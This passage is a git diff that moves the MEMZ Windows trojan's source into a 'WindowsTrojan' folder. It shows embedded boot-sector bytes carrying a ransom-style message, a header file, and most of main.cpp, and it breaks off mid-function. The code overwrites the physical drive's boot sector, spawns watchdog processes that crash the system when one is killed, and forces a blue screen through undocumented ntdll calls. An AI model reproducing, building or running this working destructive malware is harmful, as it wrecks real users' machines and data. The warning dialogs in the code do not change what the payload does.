0x03, 0xC8, + 0x04, 0x03, 0xC0, 0x08, 0x85, 0x0A, 0x00, 0x70, 0x77, 0x07, 0x00, 0x03, + 0x8E, 0x05, 0x02, 0xFA, 0x04, 0x81, 0xDC, 0xD0, 0x03, 0xA2, 0x04, 0x80, + 0x77, 0x03, 0xEA, 0x04, 0x03, 0xEE, 0x04, 0x03, 0x55, 0x1A, 0x83, 0xAA, + 0xAA, 0xAA, 0xAA, 0x04, 0x10, 0x04, 0x04, 0x10, 0x08, 0x04, 0x16, 0x0A, + 0x85, 0x0A, 0x00, 0x70, 0x70, 0x00, 0xEE, 0x02, 0xF9, 0x07, 0x03, 0x98, + 0x05, 0x80, 0xF0, 0x04, 0x38, 0x04, 0x80, 0x70, 0x04, 0x3B, 0x05, 0x03, + 0xA6, 0x19, 0x83, 0xA3, 0xA3, 0xA3, 0xA3, 0x04, 0x60, 0x04, 0x83, 0x33, + 0x33, 0x33, 0x33, 0x04, 0x68, 0x04, 0x04, 0x60, 0x0D, 0x83, 0x03, 0x00, + 0xEE, 0xDE, 0x02, 0xF1, 0x04, 0x03, 0x96, 0x07, 0x81, 0x77, 0x70, 0x04, + 0x3F, 0x04, 0x04, 0x8C, 0x04, 0x04, 0x46, 0x1A, 0x04, 0x68, 0x08, 0x87, + 0x39, 0x39, 0x39, 0x39, 0xF9, 0x39, 0x39, 0x39, 0x04, 0xB0, 0x0C, 0x9A, + 0x39, 0x30, 0x00, 0xE0, 0xEE, 0xEE, 0xDE, 0xDE, 0xDE, 0xDE, 0xDE, 0xDE, + 0xDE, 0x0E, 0x70, 0x77, 0x77, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, + 0x77, 0x70, 0x01, 0x03, 0xA7, 0x19, 0x83, 0x99, 0x99, 0x99, 0x99, 0x05, + 0x00, 0x04, 0x81, 0x99, 0x9F, 0x05, 0x04, 0x06, 0x05, 0x00, 0x09, 0x88, + 0x99, 0x99, 0x99, 0x00, 0x77, 0x77, 0x70, 0x00, 0x01, 0x03, 0x88, 0x04, + 0x83, 0x01, 0x01, 0x01, 0x01, 0x05, 0x21, 0x06, 0x05, 0x2B, 0x05, 0x03, + 0x05, 0x1B, 0x83, 0x91, 0x91, 0x91, 0x91, 0x05, 0x50, 0x04, 0x05, 0x48, + 0x10, 0x05, 0x5C, 0x04, 0x05, 0x27, 0x04, 0x05, 0x6A, 0x05, 0x05, 0x59, + 0x07, 0x05, 0x6D, 0x07, 0x01, 0xB8, 0x98, 0x00, 0x9F, 0xF1, 0x06, 0x99, + 0x73, 0x05, 0xAC, 0x93, 0x07, 0x7F, 0x06, 0x07, 0x7F, 0x4B, 0x82, 0xF1, + 0x11, 0x1F, 0x05, 0xAB, 0xFF, 0x08, 0xAA, 0xBB, 0x02, 0x50, 0xF9, 0x03, + 0x48, 0x05, 0x03, 0x4E, 0x05, 0x80, 0x11, 0x03, 0x53, 0x1C, 0x03, 0x70, + 0x18, 0x84, 0xEE, 0xE0, 0xE0, 0xEE, 0xEE, 0x03, 0x8D, 0x0C, 0x03, 0x98, + 0x08, 0x81, 0xE0, 0x00, 0x03, 0xA2, 0x1D, 0x03, 0xC0, 0x18, 0x04, 0x44, + 0x04, 0x81, 0xE0, 0xE0, 0x03, 0xDE, 0x0A, 0x80, 0xDD, 0x03, 0xE8, 0x27, + 0x04, 0x11, 0x1A, 0x83, 0x70, 0x70, 0x77, 0x77, 0x04, 0x2E, 
0x0A, 0x04, + 0x37, 0x28, 0x04, 0x60, 0x1C, 0x80, 0x03, 0x04, 0x7D, 0x0B, 0x04, 0x87, + 0x28, 0x04, 0xC0, 0x0D, 0x04, 0xBD, 0x10, 0x80, 0x39, 0x04, 0xCE, 0x0B, + 0x04, 0xD8, 0x27, 0x05, 0x10, 0x0C, 0x0C, 0xD0, 0x0C, 0x05, 0x17, 0x08, + 0x05, 0x20, 0x0B, 0x05, 0x2A, 0x25, 0x05, 0x62, 0x06, 0x80, 0xF1, 0x05, + 0x57, 0x15, 0x05, 0x71, 0x07, 0x05, 0x72, 0x11, 0x05, 0x82, 0x2A, 0x05, + 0xAD, 0xFF, 0x06, 0xB1, 0xFF, 0x07, 0xB5, 0xAE, 0x81, 0x11, 0x11, 0x01, + 0x92, 0x4F, 0x00, 0xDC, 0xB5, 0x0E, 0xFC, 0x9C, 0x00, 0x4B, 0x54, 0x0A, + 0x59, 0x15, 0x12, 0x25, 0x0A, 0x84, 0x10, 0x0E, 0x0E, 0x0E, 0x0E, 0x12, + 0x40, 0x04, 0x12, 0x40, 0x08, 0x0A, 0x81, 0x1F, 0x80, 0x11, 0x0A, 0xA9, + 0x15, 0x12, 0x75, 0x09, 0x83, 0x00, 0xEE, 0xEE, 0xED, 0x0C, 0x04, 0x05, + 0x80, 0xDC, 0x0B, 0xB5, 0x04, 0x0A, 0xCD, 0x05, 0x0A, 0xD1, 0x41, 0x0C, + 0x01, 0x08, 0x82, 0xDD, 0xD0, 0xD0, 0x12, 0x99, 0x04, 0x12, 0xA1, 0x04, + 0x0A, 0x2F, 0x1B, 0x0B, 0x49, 0x10, 0x13, 0x10, 0x0E, 0x0B, 0x5E, 0x08, + 0x12, 0x9A, 0x04, 0x80, 0x00, 0x0B, 0x6C, 0x04, 0x03, 0x4F, 0x06, 0x0B, + 0x75, 0x1B, 0x0B, 0x99, 0x0F, 0x0B, 0x98, 0x0F, 0x13, 0x2E, 0x05, 0x12, + 0x9A, 0x05, 0x0C, 0x57, 0x07, 0x0C, 0xB1, 0x05, 0x0B, 0x74, 0x1C, 0x04, + 0x10, 0x1A, 0x82, 0xA0, 0xA0, 0xA0, 0x03, 0xDD, 0x04, 0x13, 0x83, 0x06, + 0x80, 0xCD, 0x13, 0x89, 0x05, 0x80, 0x7F, 0x0C, 0x64, 0x04, 0x13, 0xDB, + 0x06, 0x0C, 0x68, 0x1F, 0x0C, 0x30, 0x11, 0x0B, 0x72, 0x04, 0x04, 0x2C, + 0x05, 0x13, 0x32, 0x0B, 0x80, 0x77, 0x13, 0x91, 0x05, 0x80, 0x07, 0x14, + 0x2C, 0x05, 0x13, 0xE8, 0x18, 0x0C, 0x89, 0x15, 0x14, 0x55, 0x04, 0x88, + 0x03, 0x03, 0x03, 0x03, 0x33, 0x00, 0xEE, 0xEE, 0xDE, 0x12, 0xE2, 0x07, + 0x80, 0x0D, 0x0C, 0x64, 0x05, 0x81, 0x70, 0x70, 0x04, 0x2B, 0x04, 0x80, + 0x77, 0x0C, 0xB5, 0x1A, 0x05, 0x0E, 0x0E, 0x0C, 0xDD, 0x11, 0x84, 0x07, + 0xE0, 0xE0, 0xE0, 0xE0, 0x14, 0xC0, 0x04, 0x87, 0xE0, 0xE0, 0xE0, 0x00, + 0x70, 0x70, 0x70, 0x70, 0x14, 0xCC, 0x04, 0x80, 0x70, 0x04, 0xE5, 0x1B, + 0x81, 0xF1, 0x1F, 0x11, 0xCF, 0x05, 0x05, 0x50, 0x17, 0x80, 
0x00, 0x14, + 0xD4, 0x04, 0x82, 0x01, 0x70, 0x70, 0x14, 0x38, 0x07, 0x15, 0x13, 0x05, + 0x15, 0x13, 0x0A, 0x05, 0xAD, 0xFF, 0x0F, 0xE2, 0xE7, 0x0F, 0xD9, 0x93, + 0x05, 0xAC, 0xFF, 0x16, 0x23, 0xA0, 0x17, 0xA5, 0x04, 0x08, 0x18, 0x4D, + 0x08, 0x14, 0x5B, 0x12, 0x20, 0xFF, 0x13, 0x1F, 0xAD, 0x81, 0x07, 0x07, + 0x13, 0xCE, 0x4A, 0x83, 0xA0, 0x07, 0x77, 0x70, 0x14, 0x1C, 0x4C, 0x84, + 0x03, 0x70, 0x70, 0x03, 0x33, 0x14, 0x6D, 0x34, 0x14, 0xA2, 0x1C, 0x81, + 0x90, 0x07, 0x14, 0xBF, 0x31, 0x05, 0x49, 0x1D, 0x15, 0x0E, 0xFF, 0x18, + 0x97, 0xFF, 0x08, 0x15, 0x94, 0x14, 0xF0, 0x07, 0x05, 0xAD, 0xFF, 0x16, + 0x2D, 0xFF, 0x20, 0x84, 0x4C, 0x0A, 0x50, 0x1E, 0x81, 0x44, 0x40, 0x1A, + 0x10, 0x30, 0x0A, 0xA0, 0x20, 0x1A, 0x60, 0x5A, 0x81, 0xD0, 0xD0, 0x22, + 0x38, 0x05, 0x0B, 0x21, 0x04, 0x21, 0xF1, 0x1B, 0x0B, 0x40, 0x19, 0x1B, + 0x49, 0x0A, 0x22, 0x34, 0x06, 0x1B, 0x0A, 0x07, 0x81, 0xDD, 0xEE, 0x14, + 0x18, 0x04, 0x03, 0xA6, 0x31, 0x81, 0xE0, 0x07, 0x03, 0x89, 0x04, 0x0B, + 0xAD, 0x06, 0x1B, 0xA1, 0x06, 0x1B, 0x5A, 0x26, 0x1B, 0x7F, 0x18, 0x81, + 0x0A, 0x0A, 0x1C, 0xA2, 0x04, 0x1B, 0x9D, 0x0B, 0x1B, 0xA9, 0x27, 0x0C, + 0x2F, 0x21, 0x22, 0xD1, 0x0B, 0x1B, 0xFC, 0x24, 0x0C, 0x7F, 0x1E, 0x80, + 0x30, 0x1C, 0x3E, 0x0A, 0x1C, 0x49, 0x27, 0x1C, 0x6F, 0x1C, 0x80, 0x90, + 0x23, 0x18, 0x06, 0x1C, 0x93, 0x2E, 0x05, 0x50, 0x1B, 0x15, 0x0E, 0xFF, + 0x10, 0xD9, 0xF8, 0x80, 0xF1, 0x26, 0x50, 0x4D, 0x00, 0x9E, 0x47, 0x82, + 0xF1, 0xF1, 0x1F, 0x26, 0xA2, 0x4E, 0x05, 0xAB, 0xFF, 0x06, 0xE0, 0xFF, + 0x21, 0xB6, 0xD3, 0x03, 0x49, 0x05, 0x22, 0x8E, 0x05, 0x03, 0x53, 0x35, + 0x0B, 0x58, 0x0E, 0x23, 0xC5, 0x08, 0x03, 0x9E, 0x3A, 0x0B, 0xA8, 0x0B, + 0x2A, 0x0A, 0x05, 0x03, 0xE8, 0x41, 0x0B, 0xF9, 0x08, 0x23, 0x71, 0x0B, + 0x04, 0x3C, 0x40, 0x23, 0xBC, 0x10, 0x04, 0x8C, 0x30, 0x23, 0xFC, 0x1C, + 0x24, 0x17, 0x05, 0x0C, 0xAE, 0x22, 0x80, 0x1F, 0x24, 0x40, 0x1D, 0x80, + 0x77, 0x24, 0x5E, 0x0C, 0x86, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x0C, 0xF4, 0x04, 0x29, 0x0C, 0x1B, 0x24, 0x90, 0x20, 0x2C, 
0x7B, 0x05, + 0x2C, 0x6B, 0x05, 0x24, 0xAB, 0x0F, 0x00, 0x38, 0xFF, 0x2D, 0x19, 0x7F, + 0x2C, 0xFF, 0x4E, 0x27, 0x37, 0x98, 0x26, 0x9D, 0x9A, 0x05, 0xAD, 0xFF, + 0x25, 0xF5, 0x5A, 0x1F, 0x6F, 0x40, 0x0A, 0x20, 0x30, 0x19, 0xF0, 0x1E, + 0x80, 0x10, 0x0A, 0x6F, 0x31, 0x1A, 0x40, 0x20, 0x02, 0xF0, 0x80, 0x1A, + 0xE0, 0x18, 0x0D, 0x01, 0x04, 0x80, 0x60, 0x1A, 0xFD, 0x09, 0x03, 0x96, + 0x2A, 0x1B, 0x30, 0x18, 0x80, 0x0E, 0x03, 0xD9, 0x87, 0x1B, 0xD0, 0x18, + 0x33, 0x4A, 0x05, 0x04, 0x7D, 0x33, 0x14, 0x50, 0x19, 0x33, 0x9B, 0x04, + 0x04, 0xCD, 0x29, 0x30, 0xA1, 0x0A, 0x0C, 0xD1, 0x1F, 0x05, 0x1F, 0x25, + 0x1E, 0x89, 0x13, 0x2C, 0x60, 0x15, 0x05, 0x6C, 0x27, 0x08, 0x12, 0xFF, + 0x30, 0x33, 0xFD, 0x07, 0xBE, 0xFF, 0x2D, 0x1A, 0xFF, 0x2E, 0x19, 0x93, + 0x31, 0x36, 0x0B, 0x80, 0xF0, 0x31, 0x3C, 0xED, 0x0B, 0x19, 0x27, 0x1A, + 0xE0, 0x19, 0x81, 0x60, 0x60, 0x1A, 0xFB, 0x0B, 0x0B, 0x66, 0x2A, 0x32, + 0xA0, 0x18, 0x0B, 0xA8, 0x88, 0x33, 0x40, 0x1C, 0x0C, 0x4C, 0x34, 0x33, + 0x90, 0x1D, 0x80, 0x33, 0x0C, 0x9E, 0x1F, 0x35, 0xE0, 0x13, 0x0C, 0xD0, + 0x50, 0x24, 0x89, 0x1D, 0x0D, 0x3D, 0x1D, 0x0F, 0xD9, 0xFF, 0x06, 0xBC, + 0xFF, 0x0F, 0x88, 0xFF, 0x10, 0x84, 0xFF, 0x26, 0x54, 0xCA, 0x21, 0xC0, + 0xCA, 0x1A, 0xBA, 0x26, 0x22, 0xB0, 0x29, 0x1B, 0x09, 0x27, 0x2A, 0xD0, + 0x18, 0x42, 0x4A, 0x06, 0x13, 0x7E, 0x82, 0x2B, 0x70, 0x18, 0x14, 0x18, + 0x38, 0x2B, 0xC0, 0x19, 0x84, 0x09, 0x09, 0x09, 0x09, 0x39, 0x1C, 0x3E, + 0x4F, 0x14, 0xBD, 0x33, 0x05, 0x50, 0x1C, 0x24, 0xA9, 0x15, 0x80, 0xF1, + 0x15, 0x22, 0xFF, 0x16, 0x51, 0xFF, 0x17, 0x50, 0xFF, 0x18, 0x4D, 0xFF, + 0x36, 0x7C, 0xD2, 0x41, 0x00, 0xFF, 0x41, 0xFF, 0xAD, 0x1B, 0x9C, 0x34, + 0x42, 0xE0, 0x18, 0x80, 0x30, 0x1B, 0xE9, 0x37, 0x43, 0x30, 0x18, 0x84, + 0x09, 0x70, 0x70, 0x09, 0x39, 0x43, 0x4D, 0x50, 0x1C, 0x8D, 0x33, 0x43, + 0xD0, 0x1D, 0x43, 0xEE, 0x0C, 0x82, 0xF1, 0xF1, 0x1F, 0x24, 0xBA, 0x4F, + 0x46, 0x55, 0xD1, 0x1E, 0x3B, 0xFF, 0x01, 0x5B, 0x37, 0x05, 0xAD, 0xFF, + 0x16, 0x29, 0xFF, 0x4F, 0x30, 0x80, 0x19, 0xF0, 0xCA, 0x22, 
0x8A, 0x26, + 0x1A, 0xE0, 0x29, 0x22, 0xD9, 0x27, 0x3A, 0x70, 0x17, 0x23, 0x17, 0x89, + 0x3B, 0x10, 0x20, 0x23, 0xC0, 0x30, 0x33, 0x90, 0x1F, 0x24, 0x0F, 0x81, + 0x4B, 0x99, 0x1B, 0x4B, 0xBD, 0x04, 0x44, 0x01, 0x05, 0x40, 0x84, 0x06, + 0x4B, 0xCC, 0x48, 0x2F, 0x50, 0xD0, 0x3F, 0xE2, 0x9D, 0x40, 0x81, 0x04, + 0x2F, 0x01, 0xFF, 0x05, 0xAD, 0xFF, 0x06, 0xFA, 0xFF, 0x50, 0x80, 0xE9, + 0x2A, 0x59, 0x27, 0x3A, 0x20, 0x26, 0x2A, 0xA6, 0x2A, 0x3A, 0x70, 0x23, + 0x2A, 0xF3, 0x7D, 0x52, 0x80, 0x2C, 0x33, 0x6C, 0x3B, 0x80, 0x3F, 0x52, + 0xE8, 0x10, 0x2B, 0xE8, 0x27, 0x53, 0x1F, 0x16, 0x80, 0xF9, 0x5B, 0x02, + 0x04, 0x2C, 0x2A, 0x35, 0x53, 0x6F, 0x15, 0x80, 0xF1, 0x5B, 0x45, 0x05, + 0x80, 0xF1, 0x2C, 0x7B, 0x31, 0x08, 0x4A, 0xFF, 0x57, 0x90, 0x97, 0x5C, + 0xD1, 0x4F, 0x5D, 0x22, 0x4F, 0x87, 0x7E, 0x27, 0x12, 0x27, 0x4C, 0x46, + 0xB8, 0x44, 0x5D, 0xC0, 0x05, 0x8E, 0x26, 0xB8, 0x24, 0x34, 0x24, 0xBF, + 0x23, 0x34, 0x24, 0x00, 0x25, 0xB8, 0x44, 0x4C, 0x46, 0x5D, 0xC0, 0x08, + 0x5D, 0xD4, 0x05, 0xA0, 0x24, 0x34, 0x24, 0x89, 0x23, 0xBF, 0x23, 0x89, + 0x23, 0x34, 0x24, 0x4C, 0x46, 0x9D, 0x45, 0x7E, 0x27, 0x7E, 0x27, 0x70, + 0x49, 0xF0, 0x27, 0x68, 0x28, 0x70, 0x29, 0x70, 0x69, 0x68, 0x48, 0xF0, + 0x47, 0x5D, 0xFE, 0x06, 0x87, 0x68, 0x28, 0x7E, 0x27, 0x4C, 0x26, 0x9D, + 0x25, 0x5E, 0x12, 0x04, 0x5E, 0x10, 0x04, 0x5E, 0x0E, 0x04, 0x85, 0x70, + 0x29, 0x7E, 0x47, 0x4C, 0x46, 0x5E, 0x16, 0x0C, 0x83, 0xF0, 0x27, 0x7E, + 0x27, 0x5E, 0x0A, 0x08, 0x81, 0xF0, 0x47, 0x5E, 0x0E, 0x08, 0x5E, 0x46, + 0x04, 0x5E, 0x3C, 0x05, 0x84, 0x48, 0x70, 0x49, 0x68, 0x48, 0x5D, 0xF4, + 0x66, 0x85, 0x70, 0x49, 0x99, 0x2C, 0x39, 0x2B, 0x5E, 0xC0, 0x06, 0x5E, + 0xAA, 0x06, 0x83, 0x70, 0x29, 0x12, 0x27, 0x5D, 0xC8, 0x06, 0x81, 0x70, + 0x49, 0x5E, 0xC6, 0x08, 0x81, 0x99, 0x2C, 0x5E, 0xD4, 0x04, 0x5E, 0xB6, + 0x04, 0x87, 0x99, 0x2C, 0xFB, 0x2E, 0x24, 0x2E, 0x99, 0x2C, 0x5E, 0xC0, + 0x0E, 0x5E, 0xCC, 0x08, 0x5F, 0x00, 0x04, 0x5E, 0xF6, 0x04, 0x83, 0x70, + 0x29, 0x00, 0x2A, 0x5F, 0x0C, 0x06, 0x5E, 0xD2, 0x0C, 0x81, 
0x00, 0x4A,
+ 0x5E, 0xC0, 0x6C, 0xBC, 0x68, 0x48, 0x59, 0x6F, 0x75, 0x72, 0x20, 0x63,
+ 0x6F, 0x6D, 0x70, 0x75, 0x74, 0x65, 0x72, 0x20, 0x68, 0x61, 0x73, 0x20,
+ 0x62, 0x65, 0x65, 0x6E, 0x20, 0x74, 0x72, 0x61, 0x73, 0x68, 0x65, 0x64,
+ 0x20, 0x62, 0x79, 0x20, 0x74, 0x68, 0x65, 0x20, 0x4D, 0x45, 0x4D, 0x5A,
+ 0x20, 0x74, 0x72, 0x6F, 0x6A, 0x61, 0x6E, 0x2E, 0x20, 0x4E, 0x6F, 0x77,
+ 0x20, 0x65, 0x6E, 0x6A, 0x6F, 0x5F, 0xBC, 0x06, 0x8A, 0x4E, 0x79, 0x61,
+ 0x6E, 0x20, 0x43, 0x61, 0x74, 0x2E, 0x2E, 0x2E
+};
+
+const size_t code1_len = sizeof(code1);
+const size_t code2_len = sizeof(code2);
+const size_t msg_len = sizeof(msg);
 #endif
\ No newline at end of file
diff --git a/VCProject/MEMZ/data.h b/WindowsTrojan/MEMZ/data.h
similarity index 95%
rename from VCProject/MEMZ/data.h
rename to WindowsTrojan/MEMZ/data.h
index 4cf58b7..5e5ae12 100644
--- a/VCProject/MEMZ/data.h
+++ b/WindowsTrojan/MEMZ/data.h
@@ -1,22 +1,22 @@
-#pragma once
-#include "memz.h"
-
-extern const char *sites[];
-extern const char *sounds[];
-
-extern const size_t nSites;
-extern const size_t nSounds;
-
-#ifndef CLEAN
-extern const unsigned char code1[];
-extern const unsigned char code2[];
-
-extern const size_t code1_len;
-extern const size_t code2_len;
-
-extern const unsigned char msg[];
-extern const char *msgs[];
-
-extern const size_t msg_len;
-extern const size_t nMsgs;
+#pragma once
+#include "memz.h"
+
+extern const char *sites[];
+extern const char *sounds[];
+
+extern const size_t nSites;
+extern const size_t nSounds;
+
+#ifndef CLEAN
+extern const unsigned char code1[];
+extern const unsigned char code2[];
+
+extern const size_t code1_len;
+extern const size_t code2_len;
+
+extern const unsigned char msg[];
+extern const char *msgs[];
+
+extern const size_t msg_len;
+extern const size_t nMsgs;
 #endif
\ No newline at end of file
diff --git a/VCProject/MEMZ/main.cpp b/WindowsTrojan/MEMZ/main.cpp
similarity index 96%
rename from VCProject/MEMZ/main.cpp
rename to WindowsTrojan/MEMZ/main.cpp
index 7c6ca52..d578acd 100644
--- a/VCProject/MEMZ/main.cpp
+++ b/WindowsTrojan/MEMZ/main.cpp
@@ -1,378 +1,378 @@ -#include "memz.h" - -#ifdef CLEAN -HWND mainWindow; // In the main window, in the main window, in the main window, ... -HFONT font; -HWND dialog; -#endif - -void main() { -#ifndef CLEAN - int argc; - LPWSTR *argv = CommandLineToArgvW(GetCommandLineW(), &argc); - - if (argc > 1) { - if (!lstrcmpW(argv[1], L"/watchdog")) { - CreateThread(NULL, NULL, &watchdogThread, NULL, NULL, NULL); - - WNDCLASSEXA c; - c.cbSize = sizeof(WNDCLASSEXA); - c.lpfnWndProc = WindowProc; - c.lpszClassName = "hax"; - c.style = 0; - c.cbClsExtra = 0; - c.cbWndExtra = 0; - c.hInstance = NULL; - c.hIcon = 0; - c.hCursor = 0; - c.hbrBackground = 0; - c.lpszMenuName = NULL; - c.hIconSm = 0; - - RegisterClassExA(&c); - - HWND hwnd = CreateWindowExA(0, "hax", NULL, NULL, 0, 0, 100, 100, NULL, NULL, NULL, NULL); - - MSG msg; - while (GetMessage(&msg, NULL, 0, 0) > 0) { - TranslateMessage(&msg); - DispatchMessage(&msg); - } - } - } else { - // Another very ugly formatting - if (MessageBoxA(NULL, "The software you just executed is considered malware.\r\n\ -This malware will harm your computer and makes it unusable.\r\n\ -If you are seeing this message without knowing what you just executed, simply press No and nothing will happen.\r\n\ -If you know what this malware does and are using a safe environment to test, \ -press Yes to start it.\r\n\r\n\ -DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES || -MessageBoxA(NULL, "THIS IS THE LAST WARNING!\r\n\r\n\ -THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE MADE USING THIS MALWARE!\r\n\ -STILL EXECUTE IT?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES) { - ExitProcess(0); - } - - wchar_t *fn = (wchar_t *)LocalAlloc(LMEM_ZEROINIT, 8192*2); - GetModuleFileName(NULL, fn, 8192); - - for (int i = 0; i < 5; i++) - ShellExecute(NULL, NULL, fn, L"/watchdog", NULL, SW_SHOWDEFAULT); - - SHELLEXECUTEINFO info; - info.cbSize = sizeof(SHELLEXECUTEINFO); - info.lpFile = fn; - 
info.lpParameters = L"/main"; - info.fMask = SEE_MASK_NOCLOSEPROCESS; - info.hwnd = NULL; - info.lpVerb = NULL; - info.lpDirectory = NULL; - info.hInstApp = NULL; - info.nShow = SW_SHOWDEFAULT; - - ShellExecuteEx(&info); - - SetPriorityClass(info.hProcess, HIGH_PRIORITY_CLASS); - - ExitProcess(0); - } - - HANDLE drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); - - if (drive == INVALID_HANDLE_VALUE) - ExitProcess(2); - - unsigned char *bootcode = (unsigned char *)LocalAlloc(LMEM_ZEROINIT, 65536); - - // Join the two code parts together - int i = 0; - for (; i < code1_len; i++) - *(bootcode + i) = *(code1 + i); - for (i = 0; i < code2_len; i++) - *(bootcode + i + 0x1fe) = *(code2 + i); - - DWORD wb; - if (!WriteFile(drive, bootcode, 65536, &wb, NULL)) - ExitProcess(3); - - CloseHandle(drive); - - HANDLE note = CreateFileA("\\note.txt", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); - - if (note == INVALID_HANDLE_VALUE) - ExitProcess(4); - - if (!WriteFile(note, msg, msg_len, &wb, NULL)) - ExitProcess(5); - - CloseHandle(note); - ShellExecuteA(NULL, NULL, "notepad", "\\note.txt", NULL, SW_SHOWDEFAULT); - - for (int p = 0; p < nPayloads; p++) { - Sleep(payloads[p].startDelay); - CreateThread(NULL, NULL, payloads[p].payloadHost, &payloads[p], NULL, NULL); - } - - for (;;) { - Sleep(10000); - } - -#else // CLEAN - InitCommonControls(); - - dialog = NULL; - - LOGFONT lf; - GetObject(GetStockObject(DEFAULT_GUI_FONT), sizeof(LOGFONT), &lf); - font = CreateFont(lf.lfHeight, lf.lfWidth, - lf.lfEscapement, lf.lfOrientation, lf.lfWeight, - lf.lfItalic, lf.lfUnderline, lf.lfStrikeOut, lf.lfCharSet, - lf.lfOutPrecision, lf.lfClipPrecision, lf.lfQuality, - lf.lfPitchAndFamily, lf.lfFaceName); - - WNDCLASSEX c; - c.cbSize = sizeof(WNDCLASSEX); - c.lpfnWndProc = WindowProc; - c.lpszClassName = L"MEMZPanel"; - c.style = CS_HREDRAW | 
CS_VREDRAW; - c.cbClsExtra = 0; - c.cbWndExtra = 0; - c.hInstance = NULL; - c.hIcon = 0; - c.hCursor = 0; - c.hbrBackground = (HBRUSH)(COLOR_3DFACE+1); - c.lpszMenuName = NULL; - c.hIconSm = 0; - - RegisterClassEx(&c); - - RECT rect; - rect.left = 0; - rect.right = WINDOWWIDTH; - rect.top = 0; - rect.bottom = WINDOWHEIGHT; - - AdjustWindowRect(&rect, WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, FALSE); - - mainWindow = CreateWindowEx(0, L"MEMZPanel", L"MEMZ Clean Version - Payload Panel", WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, - 50, 50, rect.right-rect.left, rect.bottom-rect.top, NULL, NULL, GetModuleHandle(NULL), NULL); - - for (int p = 0; p < nPayloads; p++) { - payloads[p].btn = CreateWindowW(L"BUTTON", payloads[p].name, (p==0?WS_GROUP:0) | WS_VISIBLE | WS_CHILD | WS_TABSTOP | BS_PUSHLIKE | BS_AUTOCHECKBOX | BS_NOTIFY, - (p%COLUMNS)*BTNWIDTH+SPACE*(p%COLUMNS+1), (p/COLUMNS)*BTNHEIGHT + SPACE*(p/COLUMNS+1), BTNWIDTH, BTNHEIGHT, - mainWindow, NULL, (HINSTANCE)GetWindowLong(mainWindow, GWL_HINSTANCE), NULL); - SendMessage(payloads[p].btn, WM_SETFONT, (WPARAM)font, TRUE); - - CreateThread(NULL, NULL, payloads[p].payloadHost, &payloads[p], NULL, NULL); - //CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL); - } - - SendMessage(mainWindow, WM_SETFONT, (WPARAM)font, TRUE); - - ShowWindow(mainWindow, SW_SHOW); - UpdateWindow(mainWindow); - - CreateThread(NULL, NULL, &keyboardThread, NULL, NULL, NULL); - - MSG msg; - while (GetMessage(&msg, NULL, 0, 0) > 0) { - if (dialog == NULL || !IsDialogMessage(dialog, &msg)) { - TranslateMessage(&msg); - DispatchMessage(&msg); - } - } -#endif -} - -#ifndef CLEAN -LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { - if (msg == WM_CLOSE || msg == WM_ENDSESSION) { - killWindows(); - return 0; - } - - return DefWindowProc(hwnd, msg, wParam, lParam); -} - -DWORD WINAPI watchdogThread(LPVOID parameter) { - int oproc = 0; - - char *fn = (char 
*)LocalAlloc(LMEM_ZEROINIT, 512); - GetProcessImageFileNameA(GetCurrentProcess(), fn, 512); - - Sleep(1000); - - for (;;) { - HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); - PROCESSENTRY32 proc; - proc.dwSize = sizeof(proc); - - Process32First(snapshot, &proc); - - int nproc = 0; - do { - HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, proc.th32ProcessID); - char *fn2 = (char *)LocalAlloc(LMEM_ZEROINIT, 512); - GetProcessImageFileNameA(hProc, fn2, 512); - - if (!lstrcmpA(fn, fn2)) { - nproc++; - } - - CloseHandle(hProc); - LocalFree(fn2); - } while (Process32Next(snapshot, &proc)); - - CloseHandle(snapshot); - - if (nproc < oproc) { - killWindows(); - } - - oproc = nproc; - - Sleep(10); - } -} - -void killWindows() { - // Show cool MessageBoxes - for (int i = 0; i < 20; i++) { - CreateThread(NULL, 4096, &ripMessageThread, NULL, NULL, NULL); - Sleep(100); - } - - killWindowsInstant(); -} - -void killWindowsInstant() { - // Try to force BSOD first - // I like how this method even works in user mode without admin privileges on all Windows versions since XP (or 2000, idk)... - // This isn't even an exploit, it's just an undocumented feature. 
- HMODULE ntdll = LoadLibraryA("ntdll"); - FARPROC RtlAdjustPrivilege = GetProcAddress(ntdll, "RtlAdjustPrivilege"); - FARPROC NtRaiseHardError = GetProcAddress(ntdll, "NtRaiseHardError"); - - if (RtlAdjustPrivilege != NULL && NtRaiseHardError != NULL) { - BOOLEAN tmp1; DWORD tmp2; - ((void(*)(DWORD, DWORD, BOOLEAN, LPBYTE))RtlAdjustPrivilege)(19, 1, 0, &tmp1); - ((void(*)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD))NtRaiseHardError)(0xc0000022, 0, 0, 0, 6, &tmp2); - } - - // If the computer is still running, do it the normal way - HANDLE token; - TOKEN_PRIVILEGES privileges; - - OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token); - - LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &privileges.Privileges[0].Luid); - privileges.PrivilegeCount = 1; - privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; - - AdjustTokenPrivileges(token, FALSE, &privileges, 0, (PTOKEN_PRIVILEGES)NULL, 0); - - // The actual restart - ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_HARDWARE | SHTDN_REASON_MINOR_DISK); -} - -DWORD WINAPI ripMessageThread(LPVOID parameter) { - HHOOK hook = 